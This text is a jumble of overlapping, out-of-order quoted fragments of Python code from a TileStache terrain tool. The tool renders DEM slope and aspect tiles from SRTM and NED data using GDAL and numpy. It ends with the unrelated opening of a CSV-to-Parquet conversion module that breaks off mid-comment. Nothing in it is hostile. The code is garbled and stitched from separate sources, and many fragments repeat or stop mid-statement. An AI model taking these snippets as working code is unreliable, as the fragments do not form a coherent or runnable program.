Tilestache-compatible seeding layer for", "http://tilestache.org/doc/#custom-providers for information on how the SlopeAndAspect object interacts with TileStache. \"\"\" def", "''' ''' driver = gdal.GetDriverByName('GTiff') handle, filename = mkstemp(dir=tmpdir, prefix='dem-tools-hillup-data-render-', suffix='.tif') close(handle) ds", "response object with PIL-like save() and crop() methods. This object knows only how", "# osr.UseExceptions() # <-- otherwise errors will be silent and useless. webmerc_proj =", "osr.UseExceptions() # <-- otherwise errors will be silent and useless. 
webmerc_proj = SphericalMercator()", "height, srs, xmin, ymin, xmax, ymax, zoom): \"\"\" Return an instance of SlopeAndAspect", "do_blending: composite_without = composite_ds.ReadAsArray() ds_args = minlon, minlat, maxlon, maxlat, self.demdir for ds_dem", "layer, demdir, tmpdir=None, source='srtm-ned'): self.tmpdir = tmpdir self.demdir = demdir self.source = source", "terrible bottom, top = SRTM3, NED10m elif zoom == SRTM1.ideal_zoom: #return [(SRTM1, 1)]", "= NED1km, NED100m bottom, top = NED1km, NED100m elif zoom == NED100m.ideal_zoom: return", "# estimate the raster density across source DEM and output dem_samples = (maxlon", "pi/2 for flat ground. Aspect is returned in radians, counterclockwise from -pi at", "objname = funcpath.split(':', 1) __import__(modname) module = modules[modname] _func = eval(objname, module.__dict__) if", "area_wkt, self.tmpdir) proportion_complete = 0. for (module, proportion) in providers: cs2cs = osr.CoordinateTransformation(webmerc_sref,", "\"\"\" def __init__(self, tmpdir, slope, aspect, wkt, xform): \"\"\" Instantiate with array of", "window[3] + window[3] + window[6]) \\ - (window[2] + window[5] + window[5] +", "= SRTM3, NED10m elif zoom == SRTM1.ideal_zoom: #return [(SRTM1, 1)] # SRTM1 looks", "proportion < 1) if do_blending: composite_without = composite_ds.ReadAsArray() ds_args = minlon, minlat, maxlon,", "1)] # SRTM1 looks terrible bottom, top = SRTM3, NED10m elif SRTM1.ideal_zoom <", "NED10m # SRTM1 looks terrible bottom, top = SRTM3, NED10m elif zoom >=", "tile directory. 
\"\"\" def __init__(self, demdir, tiledir, tmpdir, source, size): \"\"\" \"\"\" cache", "SRTM1 looks terrible bottom, top = SRTM3, NED10m elif zoom == SRTM1.ideal_zoom: #return", "== SRTM1.ideal_zoom: #return [(SRTM1, 1)] # SRTM1 looks terrible bottom, top = SRTM3,", "NotImplementedError() def choose_providers_srtm(zoom): \"\"\" Return a list of data sources and proportions for", "radians, from 0 to pi/2 slope = pi/2 - numpy.arctan(numpy.sqrt(x*x + y*y)) #", "zoom == NED100m.ideal_zoom: return [(NED100m, 1)] elif NED100m.ideal_zoom < zoom and zoom <", "ext.lower() != 'tiff': raise Exception() return 'image/tiff', 'TIFF' def renderArea(self, width, height, srs,", "module.datasources(*ds_args): # estimate the raster density across source DEM and output dem_samples =", "zoom == SRTM1.ideal_zoom: #return [(SRTM1, 1)] # SRTM1 looks terrible bottom, top =", "= [(VFP, 1)] elif self.source == 'worldwide': providers = [(Worldwide, 1)] else: providers", "useless. webmerc_proj = SphericalMercator() webmerc_sref = osr.SpatialReference() webmerc_sref.ImportFromProj4(webmerc_proj.srs) class SeedingLayer (Layer): \"\"\" Tilestache-compatible", "implemented! \"\"\" raise NotImplementedError() def choose_providers_srtm(zoom): \"\"\" Return a list of data sources", "Reproject and merge DEM datasources into destination datasets. # driver = gdal.GetDriverByName('GTiff') composite_ds", "ds_dem = None # # Perform alpha-blending if needed. # if do_blending: proportion_with", "in radians, counterclockwise from -pi at north around to pi. Logic here is", "crop(self, box): \"\"\" Returns a rectangular region from the current image. 
Box is", "import Configuration from TileStache.Caches import Disk from osgeo import gdal, osr from PIL", "1.0 # # Prepare information for datasets of the desired extent and projection.", "ds.SetProjection(wkt) ds.GetRasterBand(1).WriteArray(numpy.ones((width, height), numpy.float32) * -9999, 0, 0) ds.GetRasterBand(1).SetNoDataValue(-9999) return ds def calculate_slope_aspect(elevation,", "from 0 to pi/2 slope = pi/2 - numpy.arctan(numpy.sqrt(x*x + y*y)) # in", "self.xform = xform def save(self, output, format): \"\"\" Save a two-band GeoTIFF to", "__init__(self, demdir, tiledir, tmpdir, source, size): \"\"\" \"\"\" cache = Disk(tiledir, dirs='safe') config", "(ymin - ymax) / height area_wkt = webmerc_sref.ExportToWkt() buffered_xform = xmin - xres,", "1)] difference = float(top.ideal_zoom) - float(bottom.ideal_zoom) proportion = 1. - (zoom - float(bottom.ideal_zoom))", "/ difference return [(bottom, proportion), (top, 1 - proportion)] def choose_providers_ned(zoom): \"\"\" Return", "1)] elif NED1km.ideal_zoom < zoom and zoom < NED100m.ideal_zoom: #bottom, top = NED1km,", "output file-like object. \"\"\" if format != 'TIFF': raise Exception('File format other than", "proportion), (top, 1 - proportion)] def choose_providers_ned(zoom): \"\"\" Return a list of data", "height, 1, gdal.GDT_Float32) ds.SetGeoTransform(xform) ds.SetProjection(wkt) ds.GetRasterBand(1).WriteArray(numpy.ones((width, height), numpy.float32) * -9999, 0, 0) ds.GetRasterBand(1).SetNoDataValue(-9999)", "+ window[5] + window[5] + window[8])) \\ / (8.0 * xres); y =", "NED10m elif zoom == SRTM1.ideal_zoom: #return [(SRTM1, 1)] # SRTM1 looks terrible bottom,", "return [(SRTM3, 1)] elif SRTM3.ideal_zoom < zoom and zoom < SRTM1.ideal_zoom: #bottom, top", "- float(bottom.ideal_zoom) proportion = 1. 
- (zoom - float(bottom.ideal_zoom)) / difference return [(bottom,", "xres, 0, ymax, 0, yres return SlopeAndAspect(self.tmpdir, slope, aspect, area_wkt, tile_xform) class SlopeAndAspect:", "0, yres return SlopeAndAspect(self.tmpdir, slope, aspect, area_wkt, tile_xform) class SlopeAndAspect: \"\"\" TileStache response", "= [z * elevation[row:(row + height), col:(col + width)] for (row, col) in", "'image/tiff', 'TIFF' def renderArea(self, width, height, srs, xmin, ymin, xmax, ymax, zoom): \"\"\"", "window[5] + window[8])) \\ / (8.0 * xres); y = ((window[6] + window[7]", "Save a two-band GeoTIFF to output file-like object. \"\"\" if format != 'TIFF':", "1. - (zoom - float(bottom.ideal_zoom)) / difference return [(bottom, proportion), (top, 1 -", "\"\"\" Returns a rectangular region from the current image. Box is a 4-tuple", "# driver = gdal.GetDriverByName('GTiff') composite_ds = make_empty_datasource(width+2, height+2, buffered_xform, area_wkt, self.tmpdir) proportion_complete =", "None # # Calculate and save slope and aspect. # slope, aspect =", "to save two-band 8-bit GeoTIFFs. See http://tilestache.org/doc/#custom-providers for information on how the SlopeAndAspect", "buffered_xform, area_wkt, self.tmpdir) proportion_complete = 0. for (module, proportion) in providers: cs2cs =", "alpha-blending if needed. # if do_blending: proportion_with = proportion / (proportion_complete + proportion)", "= calculate_slope_aspect(elevation, xres, yres) tile_xform = xmin, xres, 0, ymax, 0, yres return", "yres return SlopeAndAspect(self.tmpdir, slope, aspect, area_wkt, tile_xform) class SlopeAndAspect: \"\"\" TileStache response object", "and aspect. # slope, aspect = calculate_slope_aspect(elevation, xres, yres) tile_xform = xmin, xres,", "= xform def save(self, output, format): \"\"\" Save a two-band GeoTIFF to output", "left, upper, right, and lower pixels. Not yet implemented! 
\"\"\" raise NotImplementedError() def", "as SRTM1 or SRTM3, and the proportions must all add up to one.", "(mod, proportion) in providers]) == 1.0 # # Prepare information for datasets of", "SRTM1.ideal_zoom: #bottom, top = SRTM3, SRTM1 # SRTM1 looks terrible bottom, top =", "zoom <= NED1km.ideal_zoom: return [(NED1km, 1)] elif NED1km.ideal_zoom < zoom and zoom <", "NED1km, NED100m bottom, top = NED1km, NED100m elif zoom == NED100m.ideal_zoom: return [(NED100m,", "providers]) == 1.0 # # Prepare information for datasets of the desired extent", "save_slope_aspect(self.slope, self.aspect, self.wkt, self.xform, output, self.tmpdir) def crop(self, box): \"\"\" Returns a rectangular", "proportion_complete = 0. for (module, proportion) in providers: cs2cs = osr.CoordinateTransformation(webmerc_sref, module.sref) #", "flat ground. Aspect is returned in radians, counterclockwise from -pi at north around", "= cs2cs.TransformPoint(xmin - xres, ymin + yres) maxlon, maxlat, z = cs2cs.TransformPoint(xmax +", "self.tmpdir) def crop(self, box): \"\"\" Returns a rectangular region from the current image.", "NED100m.ideal_zoom < zoom and zoom < NED10m.ideal_zoom: #bottom, top = NED100m, NED10m bottom,", "resample) ds_dem = None # # Perform alpha-blending if needed. # if do_blending:", "one pixel on all sides minlon, minlat, z = cs2cs.TransformPoint(xmin - xres, ymin", "# xres = (xmax - xmin) / width yres = (ymin - ymax)", "= composite_ds.ReadAsArray() unlink(composite_ds.GetFileList()[0]) composite_ds = None # # Calculate and save slope and", "'ned-only': providers = choose_providers_ned(zoom) elif self.source == 'vfp': providers = [(VFP, 1)] elif", "unlink(composite_ds.GetFileList()[0]) composite_ds = None # # Calculate and save slope and aspect. #", "aspect, area_wkt, tile_xform) class SlopeAndAspect: \"\"\" TileStache response object with PIL-like save() and", "crop() methods. This object knows only how to save two-band 8-bit GeoTIFFs. See", "with TileStache. 
\"\"\" def __init__(self, layer, demdir, tmpdir=None, source='srtm-ned'): self.tmpdir = tmpdir self.demdir", "save(self, output, format): \"\"\" Save a two-band GeoTIFF to output file-like object. \"\"\"", "height+2, buffered_xform, area_wkt, self.tmpdir) proportion_complete = 0. for (module, proportion) in providers: cs2cs", "in providers: cs2cs = osr.CoordinateTransformation(webmerc_sref, module.sref) # get a lat/lon bbox buffered by", "module.sref) # get a lat/lon bbox buffered by one pixel on all sides", "== 'worldwide': providers = [(Worldwide, 1)] else: providers = load_func_path(self.source)(zoom) assert sum([proportion for", "# get a lat/lon bbox buffered by one pixel on all sides minlon,", "This object knows only how to save two-band 8-bit GeoTIFFs. See http://tilestache.org/doc/#custom-providers for", "zoom < NED100m.ideal_zoom: #bottom, top = NED1km, NED100m bottom, top = NED1km, NED100m", "= NED1km, NED100m elif zoom == NED100m.ideal_zoom: return [(NED100m, 1)] elif NED100m.ideal_zoom <", "Load external function based on a path. Example funcpath: \"Module.Submodule:Function\". \"\"\" modname, objname", "composite_with += composite_without * proportion_without composite_ds.GetRasterBand(1).WriteArray(composite_with, 0, 0) proportion_complete += proportion elevation =", "import Layer, Metatile from TileStache.Config import Configuration from TileStache.Caches import Disk from osgeo", "= eval(objname, module.__dict__) if _func is None: raise Exception('eval(%(objname)s) in %(modname)s came up", "or SRTM3, and the proportions must all add up to one. 
Return list", "ds def calculate_slope_aspect(elevation, xres, yres, z=1.0): \"\"\" Return a pair of arrays 2", "1) if do_blending: composite_without = composite_ds.ReadAsArray() ds_args = minlon, minlat, maxlon, maxlat, self.demdir", "/ (proportion_complete + proportion) proportion_without = 1 - proportion_with composite_with = composite_ds.ReadAsArray() *", "NED1km, NED100m elif zoom == NED100m.ideal_zoom: return [(NED100m, 1)] elif NED100m.ideal_zoom < zoom", "proportions for given zoom level. Each data source is a module such as", "given zoom level. Each data source is a module such as SRTM1 or", "otherwise errors will be silent and useless. webmerc_proj = SphericalMercator() webmerc_sref = osr.SpatialReference()", "+ window[2])) \\ / (8.0 * yres); # in radians, from 0 to", "+ window[3] + window[6]) \\ - (window[2] + window[5] + window[5] + window[8]))", "from itertools import product from tempfile import mkstemp from sys import modules import", "import gdal, osr from PIL import Image import numpy from .. import save_slope_aspect", "self.source == 'ned-only': providers = choose_providers_ned(zoom) elif self.source == 'vfp': providers = [(VFP,", "from math import pi, sin, cos from os import unlink, close from itertools", "xres, 0, ymax - yres, 0, yres # # Reproject and merge DEM", "enough for now if self.source == 'srtm-ned': providers = choose_providers_srtm(zoom) elif self.source ==", "4-tuple with left, upper, right, and lower pixels. Not yet implemented! \"\"\" raise", "sin, cos from os import unlink, close from itertools import product from tempfile", "- float(bottom.ideal_zoom)) / difference return [(bottom, proportion), (top, 1 - proportion)] def choose_providers_ned(zoom):", "of DEM slope and aspect data. Source parameter can be \"srtm-ned\" (default) or", "http://tilestache.org/doc/#custom-providers for information on how the Provider object interacts with TileStache. 
\"\"\" def", "top = SRTM3, NED10m elif zoom == SRTM1.ideal_zoom: #return [(SRTM1, 1)] # SRTM1", "good enough for now if self.source == 'srtm-ned': providers = choose_providers_srtm(zoom) elif self.source", "xform def save(self, output, format): \"\"\" Save a two-band GeoTIFF to output file-like", "ds_dem.GetProjection(), composite_ds.GetProjection(), resample) ds_dem = None # # Perform alpha-blending if needed. #", "current layer applied for later alpha-blending. # do_blending = bool(proportion_complete > 0 and", "choose_providers_ned(zoom): \"\"\" Return a list of data sources and proportions for given zoom", "radians, from 0 for sheer face to pi/2 for flat ground. Aspect is", "window[3] + window[6]) \\ - (window[2] + window[5] + window[5] + window[8])) \\", "elevation array. Slope is returned in radians, from 0 for sheer face to", "[(VFP, 1)] elif self.source == 'worldwide': providers = [(Worldwide, 1)] else: providers =", "0) proportion_complete += proportion elevation = composite_ds.ReadAsArray() unlink(composite_ds.GetFileList()[0]) composite_ds = None # #", "proportion_with composite_with += composite_without * proportion_without composite_ds.GetRasterBand(1).WriteArray(composite_with, 0, 0) proportion_complete += proportion elevation", "raise Exception() return 'image/tiff', 'TIFF' def renderArea(self, width, height, srs, xmin, ymin, xmax,", "on how the SlopeAndAspect object interacts with TileStache. \"\"\" def __init__(self, tmpdir, slope,", "will be silent and useless. 
webmerc_proj = SphericalMercator() webmerc_sref = osr.SpatialReference() webmerc_sref.ImportFromProj4(webmerc_proj.srs) class", "self.aspect = aspect self.w, self.h = self.slope.shape self.wkt = wkt self.xform = xform", "1 - proportion)] def make_empty_datasource(width, height, xform, wkt, tmpdir): ''' ''' driver =", "format != 'TIFF': raise Exception('File format other than TIFF for slope and aspect:", "webmerc_proj.srs # <-- good enough for now if self.source == 'srtm-ned': providers =", "from tempfile import mkstemp from sys import modules import NED10m, NED100m, NED1km, SRTM1,", "Return list has either one or two items. \"\"\" if zoom <= NED1km.ideal_zoom:", "def choose_providers_ned(zoom): \"\"\" Return a list of data sources and proportions for given", "save two-band 8-bit GeoTIFFs. See http://tilestache.org/doc/#custom-providers for information on how the SlopeAndAspect object", "SRTM1, SRTM3, VFP, Worldwide from ModestMaps.Core import Coordinate from TileStache.Geography import SphericalMercator from", "items. \"\"\" if zoom <= SRTM3.ideal_zoom: return [(SRTM3, 1)] elif SRTM3.ideal_zoom < zoom", "= SRTM3, NED10m elif zoom >= NED10m.ideal_zoom: return [(NED10m, 1)] difference = float(top.ideal_zoom)", "a rectangular region from the current image. Box is a 4-tuple with left,", "== 'ned-only': providers = choose_providers_ned(zoom) elif self.source == 'vfp': providers = [(VFP, 1)]", "and useless. webmerc_proj = SphericalMercator() webmerc_sref = osr.SpatialReference() webmerc_sref.ImportFromProj4(webmerc_proj.srs) class SeedingLayer (Layer): \"\"\"", "of the composite without the # current layer applied for later alpha-blending. #", "self.wkt = wkt self.xform = xform def save(self, output, format): \"\"\" Save a", "0, yres # # Reproject and merge DEM datasources into destination datasets. #", "difference = float(top.ideal_zoom) - float(bottom.ideal_zoom) proportion = 1. - (zoom - float(bottom.ideal_zoom)) /", "to pi. 
Logic here is borrowed from hillshade.cpp: http://www.perrygeo.net/wordpress/?p=7 \"\"\" width, height =", "desired extent and projection. # xres = (xmax - xmin) / width yres", "Aspect is returned in radians, counterclockwise from -pi at north around to pi.", "class SeedingLayer (Layer): \"\"\" Tilestache-compatible seeding layer for preparing tiled data. Intended for", "- (zoom - float(bottom.ideal_zoom)) / difference return [(bottom, proportion), (top, 1 - proportion)]", "Configuration from TileStache.Caches import Disk from osgeo import gdal, osr from PIL import", "- numpy.arctan(numpy.sqrt(x*x + y*y)) # in radians counterclockwise, from -pi at north back", "a list of data sources and proportions for given zoom level. Each data", "north around to pi. Logic here is borrowed from hillshade.cpp: http://www.perrygeo.net/wordpress/?p=7 \"\"\" width,", "at north around to pi. Logic here is borrowed from hillshade.cpp: http://www.perrygeo.net/wordpress/?p=7 \"\"\"", "# # Calculate and save slope and aspect. # slope, aspect = calculate_slope_aspect(elevation,", "# slope, aspect = calculate_slope_aspect(elevation, xres, yres) tile_xform = xmin, xres, 0, ymax,", "yres # # Reproject and merge DEM datasources into destination datasets. # driver", "= [(Worldwide, 1)] else: providers = load_func_path(self.source)(zoom) assert sum([proportion for (mod, proportion) in", "= 1 - proportion_with composite_with = composite_ds.ReadAsArray() * proportion_with composite_with += composite_without *", "DEM retrieval utilities. 
\"\"\" from math import pi, sin, cos from os import", "from osgeo import gdal, osr from PIL import Image import numpy from ..", "now if self.source == 'srtm-ned': providers = choose_providers_srtm(zoom) elif self.source == 'ned-only': providers", "bottom, top = NED1km, NED100m elif zoom == NED100m.ideal_zoom: return [(NED100m, 1)] elif", "= funcpath.split(':', 1) __import__(modname) module = modules[modname] _func = eval(objname, module.__dict__) if _func", "items. \"\"\" if zoom <= NED1km.ideal_zoom: return [(NED1km, 1)] elif NED1km.ideal_zoom < zoom", "a tile directory. \"\"\" def __init__(self, demdir, tiledir, tmpdir, source, size): \"\"\" \"\"\"", "\\ - (window[0] + window[1] + window[1] + window[2])) \\ / (8.0 *", "return [(bottom, proportion), (top, 1 - proportion)] def make_empty_datasource(width, height, xform, wkt, tmpdir):", "\"\"\" Return a list of data sources and proportions for given zoom level.", "for flat ground. Aspect is returned in radians, counterclockwise from -pi at north", "interacts with TileStache. 
\"\"\" def __init__(self, layer, demdir, tmpdir=None, source='srtm-ned'): self.tmpdir = tmpdir", "return slope, aspect def load_func_path(funcpath): \"\"\" Load external function based on a path.", "providers = [(VFP, 1)] elif self.source == 'worldwide': providers = [(Worldwide, 1)] else:", "cs2cs.TransformPoint(xmax + xres, ymax - yres) # # Keep a version of the", "import Disk from osgeo import gdal, osr from PIL import Image import numpy", "self.source == 'worldwide': providers = [(Worldwide, 1)] else: providers = load_func_path(self.source)(zoom) assert sum([proportion", "yres) tile_xform = xmin, xres, 0, ymax, 0, yres return SlopeAndAspect(self.tmpdir, slope, aspect,", "SRTM3, NED10m elif zoom == SRTM1.ideal_zoom: #return [(SRTM1, 1)] # SRTM1 looks terrible", "proportion_without = 1 - proportion_with composite_with = composite_ds.ReadAsArray() * proportion_with composite_with += composite_without", "elif NED1km.ideal_zoom < zoom and zoom < NED100m.ideal_zoom: #bottom, top = NED1km, NED100m", "(top, 1 - proportion)] def make_empty_datasource(width, height, xform, wkt, tmpdir): ''' ''' driver", "Return a pair of arrays 2 pixels smaller than the input elevation array.", "tile_xform) class SlopeAndAspect: \"\"\" TileStache response object with PIL-like save() and crop() methods.", "from ModestMaps.Core import Coordinate from TileStache.Geography import SphericalMercator from TileStache.Core import Layer, Metatile", "\"\"\" self.tmpdir = tmpdir self.slope = slope self.aspect = aspect self.w, self.h =", "TileStache. \"\"\" def __init__(self, layer, demdir, tmpdir=None, source='srtm-ned'): self.tmpdir = tmpdir self.demdir =", "if ext.lower() != 'tiff': raise Exception() return 'image/tiff', 'TIFF' def renderArea(self, width, height,", "self.tmpdir) proportion_complete = 0. for (module, proportion) in providers: cs2cs = osr.CoordinateTransformation(webmerc_sref, module.sref)", "image. Box is a 4-tuple with left, upper, right, and lower pixels. 
Not", "a 4-tuple with left, upper, right, and lower pixels. Not yet implemented! \"\"\"", "retrieval utilities. \"\"\" from math import pi, sin, cos from os import unlink,", "<-- otherwise errors will be silent and useless. webmerc_proj = SphericalMercator() webmerc_sref =", "Exception() return 'image/tiff', 'TIFF' def renderArea(self, width, height, srs, xmin, ymin, xmax, ymax,", "pi, sin, cos from os import unlink, close from itertools import product from", "= SRTM1, NED10m # SRTM1 looks terrible bottom, top = SRTM3, NED10m elif", "add up to one. Return list has either one or two items. \"\"\"", "xform, wkt, tmpdir): ''' ''' driver = gdal.GetDriverByName('GTiff') handle, filename = mkstemp(dir=tmpdir, prefix='dem-tools-hillup-data-render-',", "zoom): \"\"\" Return an instance of SlopeAndAspect for requested area. \"\"\" assert srs", "# in radians counterclockwise, from -pi at north back to pi aspect =", "used to prevent clobbering in /vsimem/, see: # http://osgeo-org.1803224.n2.nabble.com/gdal-dev-Outputting-to-vsimem-td6221295.html vsimem_counter = 1 #", "= SphericalMercator() webmerc_sref = osr.SpatialReference() webmerc_sref.ImportFromProj4(webmerc_proj.srs) class SeedingLayer (Layer): \"\"\" Tilestache-compatible seeding layer", "NED1km, SRTM1, SRTM3, VFP, Worldwide from ModestMaps.Core import Coordinate from TileStache.Geography import SphericalMercator", "useful projections. 
# osr.UseExceptions() # <-- otherwise errors will be silent and useless.", "<-- good enough for now if self.source == 'srtm-ned': providers = choose_providers_srtm(zoom) elif", "/ composite_ds.GetGeoTransform()[1] if dem_samples > area_pixels: # cubic looks better squeezing down resample", "= pi/2 - numpy.arctan(numpy.sqrt(x*x + y*y)) # in radians counterclockwise, from -pi at", "zoom < SRTM1.ideal_zoom: #bottom, top = SRTM3, SRTM1 # SRTM1 looks terrible bottom,", "tiledir, tmpdir, source, size): \"\"\" \"\"\" cache = Disk(tiledir, dirs='safe') config = Configuration(cache,", "osgeo import gdal, osr from PIL import Image import numpy from .. import", "(Layer): \"\"\" Tilestache-compatible seeding layer for preparing tiled data. Intended for use in", "buffered by one pixel on all sides minlon, minlat, z = cs2cs.TransformPoint(xmin -", "of SlopeAndAspect for requested area. \"\"\" assert srs == webmerc_proj.srs # <-- good", "(proportion_complete + proportion) proportion_without = 1 - proportion_with composite_with = composite_ds.ReadAsArray() * proportion_with", "return [(NED1km, 1)] elif NED1km.ideal_zoom < zoom and zoom < NED100m.ideal_zoom: #bottom, top", "window[7] + window[8]) \\ - (window[0] + window[1] + window[1] + window[2])) \\", "radians counterclockwise, from -pi at north back to pi aspect = numpy.arctan2(x, y)", "aspect, wkt, xform): \"\"\" Instantiate with array of slope and aspect, and minimal", "xmin - xres, xres, 0, ymax - yres, 0, yres # # Reproject", "''' driver = gdal.GetDriverByName('GTiff') handle, filename = mkstemp(dir=tmpdir, prefix='dem-tools-hillup-data-render-', suffix='.tif') close(handle) ds =", "= webmerc_sref.ExportToWkt() buffered_xform = xmin - xres, xres, 0, ymax - yres, 0,", "make_empty_datasource(width+2, height+2, buffered_xform, area_wkt, self.tmpdir) proportion_complete = 0. for (module, proportion) in providers:", "information on how the SlopeAndAspect object interacts with TileStache. 
\"\"\" def __init__(self, tmpdir,", "projections. # osr.UseExceptions() # <-- otherwise errors will be silent and useless. webmerc_proj", "elevation[row:(row + height), col:(col + width)] for (row, col) in product(range(3), range(3))] x", "Not yet implemented! \"\"\" raise NotImplementedError() def choose_providers_srtm(zoom): \"\"\" Return a list of", "extent and projection. # xres = (xmax - xmin) / width yres =", "if zoom <= SRTM3.ideal_zoom: return [(SRTM3, 1)] elif SRTM3.ideal_zoom < zoom and zoom", "# SRTM1 looks terrible bottom, top = SRTM3, NED10m elif SRTM1.ideal_zoom < zoom", "import save_slope_aspect # used to prevent clobbering in /vsimem/, see: # http://osgeo-org.1803224.n2.nabble.com/gdal-dev-Outputting-to-vsimem-td6221295.html vsimem_counter", "# # Prepare information for datasets of the desired extent and projection. #", "raise NotImplementedError() def choose_providers_srtm(zoom): \"\"\" Return a list of data sources and proportions", "of arrays 2 pixels smaller than the input elevation array. Slope is returned", "slope and aspect, and minimal geographic information. \"\"\" self.tmpdir = tmpdir self.slope =", "self.demdir = demdir self.source = source def getTypeByExtension(self, ext): if ext.lower() != 'tiff':", "width)] for (row, col) in product(range(3), range(3))] x = ((window[0] + window[3] +", "layer applied for later alpha-blending. # do_blending = bool(proportion_complete > 0 and proportion", "around to pi. Logic here is borrowed from hillshade.cpp: http://www.perrygeo.net/wordpress/?p=7 \"\"\" width, height", "calculate_slope_aspect(elevation, xres, yres) tile_xform = xmin, xres, 0, ymax, 0, yres return SlopeAndAspect(self.tmpdir,", "== 'srtm-ned': providers = choose_providers_srtm(zoom) elif self.source == 'ned-only': providers = choose_providers_ned(zoom) elif", "zoom level. Each data source is a module such as NED10m or NED1km,", "an instance of SlopeAndAspect for requested area. 
\"\"\" assert srs == webmerc_proj.srs #", "close from itertools import product from tempfile import mkstemp from sys import modules", "# Calculate and save slope and aspect. # slope, aspect = calculate_slope_aspect(elevation, xres,", "self.slope = slope self.aspect = aspect self.w, self.h = self.slope.shape self.wkt = wkt", "< zoom and zoom < SRTM1.ideal_zoom: #bottom, top = SRTM3, SRTM1 # SRTM1", "zoom < NED10m.ideal_zoom: #bottom, top = NED100m, NED10m bottom, top = NED100m, NED10m", "NED10m bottom, top = NED100m, NED10m elif zoom >= NED10m.ideal_zoom: return [(NED10m, 1)]", "pixels smaller than the input elevation array. Slope is returned in radians, from", "returned in radians, from 0 for sheer face to pi/2 for flat ground.", "+ proportion) proportion_without = 1 - proportion_with composite_with = composite_ds.ReadAsArray() * proportion_with composite_with", "1)] elif self.source == 'worldwide': providers = [(Worldwide, 1)] else: providers = load_func_path(self.source)(zoom)", "demdir, tiledir, tmpdir, source, size): \"\"\" \"\"\" cache = Disk(tiledir, dirs='safe') config =", "> area_pixels: # cubic looks better squeezing down resample = gdal.GRA_Cubic else: #", "slope, aspect, wkt, xform): \"\"\" Instantiate with array of slope and aspect, and", "upper, right, and lower pixels. Not yet implemented! 
\"\"\" raise NotImplementedError() def choose_providers_srtm(zoom):", "data source is a module such as NED10m or NED1km, and the proportions", "NED10m.ideal_zoom: #bottom, top = NED100m, NED10m bottom, top = NED100m, NED10m elif zoom", "\"\"\" modname, objname = funcpath.split(':', 1) __import__(modname) module = modules[modname] _func = eval(objname,", "aspect = numpy.arctan2(x, y) return slope, aspect def load_func_path(funcpath): \"\"\" Load external function", "import product from tempfile import mkstemp from sys import modules import NED10m, NED100m,", "proportion) in providers]) == 1.0 # # Prepare information for datasets of the", "ymax, 0, yres return SlopeAndAspect(self.tmpdir, slope, aspect, area_wkt, tile_xform) class SlopeAndAspect: \"\"\" TileStache", "of slope and aspect, and minimal geographic information. \"\"\" self.tmpdir = tmpdir self.slope", "rectangular region from the current image. Box is a 4-tuple with left, upper,", "in /vsimem/, see: # http://osgeo-org.1803224.n2.nabble.com/gdal-dev-Outputting-to-vsimem-td6221295.html vsimem_counter = 1 # # Set up some", "elevation.shape[1] - 2 window = [z * elevation[row:(row + height), col:(col + width)]", "composite_with = composite_ds.ReadAsArray() * proportion_with composite_with += composite_without * proportion_without composite_ds.GetRasterBand(1).WriteArray(composite_with, 0, 0)", "SRTM1 looks terrible bottom, top = SRTM3, NED10m elif SRTM1.ideal_zoom < zoom and", "= gdal.GRA_CubicSpline gdal.ReprojectImage(ds_dem, composite_ds, ds_dem.GetProjection(), composite_ds.GetProjection(), resample) ds_dem = None # # Perform", "dem_samples > area_pixels: # cubic looks better squeezing down resample = gdal.GRA_Cubic else:", "Configuration(cache, '.') Layer.__init__(self, config, SphericalMercator(), Metatile(), tile_height=size) self.provider = Provider(self, demdir, tmpdir, source)", "= source def getTypeByExtension(self, ext): if ext.lower() != 'tiff': raise Exception() return 'image/tiff',", "* yres); # 
in radians, from 0 to pi/2 slope = pi/2 -", "float(top.ideal_zoom) - float(bottom.ideal_zoom) proportion = 1. - (zoom - float(bottom.ideal_zoom)) / difference return", "#bottom, top = NED100m, NED10m bottom, top = NED100m, NED10m elif zoom >=", "webmerc_sref.ExportToWkt() buffered_xform = xmin - xres, xres, 0, ymax - yres, 0, yres", "# # Perform alpha-blending if needed. # if do_blending: proportion_with = proportion /", "spline looks better stretching out resample = gdal.GRA_CubicSpline gdal.ReprojectImage(ds_dem, composite_ds, ds_dem.GetProjection(), composite_ds.GetProjection(), resample)", "- proportion)] def choose_providers_ned(zoom): \"\"\" Return a list of data sources and proportions", "import SphericalMercator from TileStache.Core import Layer, Metatile from TileStache.Config import Configuration from TileStache.Caches", "the desired extent and projection. # xres = (xmax - xmin) / width", "gdal.GetDriverByName('GTiff') composite_ds = make_empty_datasource(width+2, height+2, buffered_xform, area_wkt, self.tmpdir) proportion_complete = 0. for (module,", "path. Example funcpath: \"Module.Submodule:Function\". \"\"\" modname, objname = funcpath.split(':', 1) __import__(modname) module =", "is a 4-tuple with left, upper, right, and lower pixels. Not yet implemented!", "= ((window[0] + window[3] + window[3] + window[6]) \\ - (window[2] + window[5]", "zoom and zoom < NED10m.ideal_zoom: #bottom, top = NED100m, NED10m bottom, top =", "/ height area_wkt = webmerc_sref.ExportToWkt() buffered_xform = xmin - xres, xres, 0, ymax", "errors will be silent and useless. webmerc_proj = SphericalMercator() webmerc_sref = osr.SpatialReference() webmerc_sref.ImportFromProj4(webmerc_proj.srs)", "= minlon, minlat, maxlon, maxlat, self.demdir for ds_dem in module.datasources(*ds_args): # estimate the", "wkt, xform): \"\"\" Instantiate with array of slope and aspect, and minimal geographic", "either one or two items. 
\"\"\" if zoom <= SRTM3.ideal_zoom: return [(SRTM3, 1)]", "self.w, self.h = self.slope.shape self.wkt = wkt self.xform = xform def save(self, output,", "is borrowed from hillshade.cpp: http://www.perrygeo.net/wordpress/?p=7 \"\"\" width, height = elevation.shape[0] - 2, elevation.shape[1]", "__import__(modname) module = modules[modname] _func = eval(objname, module.__dict__) if _func is None: raise", "list has either one or two items. \"\"\" if zoom <= NED1km.ideal_zoom: return", "tile_xform = xmin, xres, 0, ymax, 0, yres return SlopeAndAspect(self.tmpdir, slope, aspect, area_wkt," ]
from pathlib import Path
from typing import Dict, Type, Iterator, List, Tuple

import pyarrow as pa
from pyarrow import csv as pcsv
from pyarrow import parquet as pq
from sqlalchemy import MetaData as AlchemyMetadata, Table as AlchemyTable
from sqlalchemy import (
    Integer, SmallInteger, Float, String, CHAR, Text, Boolean, Date, DateTime,
)
from sqlalchemy.sql.type_api import TypeEngine

from src.schemas import all_metadata
from src import EXTRACT_PATH_PREFIX, TRANSFORM_PATH_PREFIX

# Output roots for the transformed artifacts, grouped by format.
PARQUET_PREFIX = TRANSFORM_PATH_PREFIX.joinpath("parquet")
CSV_PREFIX = TRANSFORM_PATH_PREFIX.joinpath("csv")

# How many bytes in each CSV chunk to bring into memory.
# Larger sizes result in better compression and slightly faster time,
